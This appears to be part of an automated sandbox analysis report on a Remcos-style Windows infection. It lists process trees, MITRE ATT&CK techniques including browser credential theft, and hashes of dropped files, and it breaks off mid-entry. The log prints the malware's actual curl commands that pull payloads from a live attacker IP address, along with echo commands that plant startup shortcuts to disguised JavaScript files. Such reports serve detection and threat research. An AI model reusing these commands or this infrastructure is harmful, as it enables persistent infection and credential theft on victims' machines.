        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2164
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:1236
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\iqqzq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2012
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\iqqzq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3664
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zjowp" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:1148
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\zjowp" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:1628
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\anlya" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:464
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\anlya" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3448
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4632
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:460
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:3364
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3092
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3188
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:1296
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mffsq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3132
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\mffsq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1820
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\eivlj" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:1420
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\eivlj" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4324
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\khpit" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:5112
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\khpit" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1440
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4216
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:4332
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:776
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:4596
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:3524
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:2848
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ytssq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1008
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ytssq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4260
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gnmox" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4368
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\gnmox" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3372
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wdamh" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1036
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\wdamh" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1368
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:5052
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3872
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:1264
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:2920
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2364
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2288
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fvyjj" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4352
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fvyjj" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1488
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fwatr" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:2324
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fwatr" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:2784
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kcqdw" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4788
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\kcqdw" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3716
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:1060
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:972
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:3488
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:2012
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:436
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:4896
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jxdqi" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1764
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\jxdqi" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3356
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qojwj" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4460
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\qojwj" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:1328
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qvqeh" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4032
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\qvqeh" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3092
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:1680
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:1052
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:3848
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:1596
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:4412
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:1568
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bbhvx" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1420
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\bbhvx" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2928
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pxwko" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:5112
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\pxwko" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3272
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vhqfd" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2220
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vhqfd" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1556
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:776
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:2848
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:4652
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:1032
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:1004
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3604
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\knbfi" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3268
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\knbfi" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3372
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bmzly" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:4124
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\bmzly" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4824
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dxcja" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1800
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\dxcja" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2852
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3744
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:1156
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:820
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:1580
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:3420
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:4492
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\makfp" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3964
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\makfp" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4580
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ihpwh" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:1216
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ihpwh" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:888
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ebdaz" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4788
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ebdaz" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2084
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tsqrp" "178.215.224.74/v10/ukyh.php?jspo=2&jwvs=80E79B56FCD3600852CF072C4FE866&zeqb=8&nehq=1"
        5⤵
        
        PID:972
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\tsqrp" "178.215.224.74/v10/ukyh.php?jspo=2&jwvs=80E79B56FCD3600852CF072C4FE866&zeqb=8&nehq=1"
        6⤵
        
        PID:1508
  - - C:\Windows\SysWOW64\choice.exe
      choice /d y /t 5
      4⤵
      System Location Discovery: System Language Discovery
      PID:3744
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & echo URL="C:\Users\Admin\AppData\Local\SafeNet Solutions Inc\CyberGuard.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & exit
  2⤵
  - Drops startup file
  PID:472
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesLearn.url" & echo URL="C:\Users\Admin\AppData\Local\EduVirtu Dynamics\MusesLearn.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesLearn.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:1544

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3140

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:1352

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
PID:2368

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /6
1⤵
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4680

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:3768

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
PID:1796

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" TurnOffDevicePortal
1⤵
PID:1780

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" TurnOffDevicePortal
1⤵
PID:3700

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:3008

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
PID:4704

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:4320

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
PID:3192

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
a2710e0e35d2ca801721efe34c5bce18

SHA1
825fe69304b19575c3ac11c7536273a366a76168

SHA256
649b2e30d4b9f9944043c938abceae4b9e00c1ae5ae64050b935ca97b40889e4

SHA512
5354e66f68f732d754a9d9f178df38442564473b6d15fb8027c4ea4838ed11113b86a9d6b0b95680724acfaad49596ca4bd0ba596c0e25ffee841ed3b054c694

Download Submit
C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif

Filesize
921KB

MD5
78ba0653a340bac5ff152b21a83626cc

SHA1
b12da9cb5d024555405040e65ad89d16ae749502

SHA256
05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7

SHA512
efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

Download Submit
C:\Users\Admin\AppData\Local\Temp\226443\d

Filesize
546KB

MD5
7e6971c69a6ca7279da0e89b4b388189

SHA1
894fdd50dead4f46ac677ad06d1455943167ae1f

SHA256
1ae9c8851afa317293db0435ea27ad3fa8fda82a08209ee536ec947130e5c98c

SHA512
06296a0878df852fdd54fb31366d09c5c1984e1f6eaea22f1895d40a78d0ff07cf7a90bf1725becc630dbb33906d0764d6f314653c8f965ffdd91310c9699c0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bailey

Filesize
82KB

MD5
c5c9551f30a44aab6152b932f7149053

SHA1
c5b31ed9091d873883a9ba4a1d19a1c8c50020f8

SHA256
ecc645d9ad7e7c4ad052e519f44d314ca15ce749fafd2be4384121704e1b26fd

SHA512
83dd79769dd3f0d0625742af94309fd5ded51615f9278cebb558e03777e5346baf08d3d6aa3c6c84df41a3e321bec83fad828c218e85f3e1d88276df17797e98

Download Submit
C:\Users\Admin\AppData\Local\Temp\Column

Filesize
75KB

MD5
d05e382bb4f1e9bb4bce6108e318ea6b

SHA1
ae0344388bc8d4e10a93c305c1f80bc60ab7bd7a

SHA256
ccd218caebb98be70e2caf40b17d54510571e48efa475cdce3c2f71581232a51

SHA512
742980e178aa801829c623ab9ff4d494d8555e2ef26542abdaf46b47fcf521ccf8dd7bf248ff98f1104a8fb18606c84bb4ca198df3ee28b96525bccae7a06d80

Download Submit
C:\Users\Admin\AppData\Local\Temp\Considerations

Filesize
67KB

MD5
fcc2e848da8d0beac27ba027ae23dc2a

SHA1
d4fae227cc35c806b7e06d85581fe7540ec4a9ca

SHA256
b2381bfddbbb5016607b0a66df94adc1b4552d6bb65682d492863c4e12a67e9b

SHA512
8c80def9f4b0c7f37aed52e7c2bc7602dc354cfefb0ca3e33704b07becb1ad3fe4828bf2f5c82ad000161dbc052e584105f305d67c1df5079d6e95b79e4f768f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Disco

Filesize
902KB

MD5
5e0a36a6a1e6ceb0bd42ed9debde8666

SHA1
6f0e0881b517206eaef33364ca40b006038b5fe2

SHA256
1fbe941b779b8ee4152e224fe6856364b5b67bb7ecef9f81ede5dd7441165a3b

SHA512
7946f6a25406a15d83bd6be6d0fa542a9d0b6c01515362fe8e318d5fce5fc792c08aa163042deaf2de88ea79431175fb14c503288c12daf6a971a9a8ddc9c80d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Eight

Filesize
50KB

MD5
7c7b509c91fd9da8ddfa9c3b5991c9eb

SHA1
61fb5cf74f58bde99c00a010e1a670beb85fd8ad

SHA256
c6e57103af0a2b2aca227a2b8683b6298711454a84ef57dc91fd35d279de9d64

SHA512
e56d32471a3c0b409a1b5a35065db89ace5f01928e915ab49a21242f74010c099f91f55272714f5f24c06824e5bbd0c4349de5bfdc6e385030defe0d726cd06a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Environment

Filesize
64KB

MD5
b6024d20dba6454f8e2df9086438fce7

SHA1
3edb339cc5960a05ab3d1ab615d4152b092ee832

SHA256
a87a9f1aee8317c1f3fd9c69ee65a569944618092cc1f6fbeb467ab2aa73cecf

SHA512
651e002fa45b48d51803fdd13ff379bf29937438df3a4001c7f935643ca1de4b5a2e4a4a376adf1b3c35b00ac1ed0856916b9d048a88a07a4d8bb989c4a62c56

Download Submit
C:\Users\Admin\AppData\Local\Temp\Events

Filesize
95KB

MD5
67498253ff01bc79ab26bdaa2183b367

SHA1
5c6efd758ab0b450c8a9ecaeb108e9272535a3b3

SHA256
60c91ae2bed2f72dda2ff6cb4deb1367a437df370be43bea1b7fdb58fd43fae8

SHA512
75fd5cf671a177d0c0ff18e2d088b1b6de0ef839cfd5ea410c4cfba65f26e2253983fb0ad7904cd4ba3f012b035a4682cc95ffbc35d96ad84c09ed2fc3cc19e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Explanation

Filesize
14KB

MD5
773bc1cb8deb9ff09bc892af84ae5681

SHA1
